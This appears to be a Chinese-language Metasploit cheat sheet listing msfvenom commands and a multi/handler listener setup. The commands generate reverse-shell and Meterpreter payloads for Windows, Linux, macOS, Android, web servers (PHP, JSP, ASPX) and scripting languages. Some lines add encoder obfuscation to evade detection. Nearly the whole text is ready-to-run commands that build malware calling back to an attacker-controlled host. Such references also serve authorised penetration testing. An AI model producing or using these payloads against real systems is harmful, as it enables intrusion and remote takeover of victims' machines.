模块
Auxiliary
Payload
>show payloads 查看所有攻击载荷
Payload是目标被攻击时执行的实际功能代码
生成载荷
>use exploit/multi/script/web_delivery
>set target 2
>msfvenom --list payloads 列出所有payload
>msfvenom --list encoders 列出所有编码器
Windows
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f exe -o /root/1.exe
>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o 1.exe
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f psh-reflection >xxx.ps1
>msfvenom -a x64 --platform windows -p windows/powershell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
>msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.0.1 LPORT=11111 -f exe> /root/1.exe 生成NC正向连接
>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f exe> 1.exe 生成NC反向连接
Linux
>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e -f elf -a x86 --platform linux -o shell
>msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.1 LPORT=11111 -f raw > shell.sh
MacOS
>msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f macho > shell.macho
Web
>msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw > shell.php
>msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f war > shell.war
>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f aspx -o payload.aspx
>msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.jsp
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f asp > shell.asp
Android
>msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f apk -o payload.apk
>msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=12138 -f raw > shell.apk
>msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=12138 R > test.apk
shellcode
>msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.0.1 LPORT=11111 -f c –o /root/1.c
>msfvenom -p cmd/unix/reverse_python LHOST=192.168.0.1 LPORT=11111 -o shell.py
>msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw > shell.py
>msfvenom -p cmd/unix/reverse_perl LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.pl
>msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.rb
>msfvenom -p cmd/unix/reverse_lua LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.lua
msf设置监听
>use exploit/multi/handler
>set payloadwindows/meterpreter/reverse_http 指定相应的payload
>set LHOST 192.168.0.1
>set LPORT 11111
>exploit -j 后台监听
或在exploit模块中直接使用set payload 命令指定payload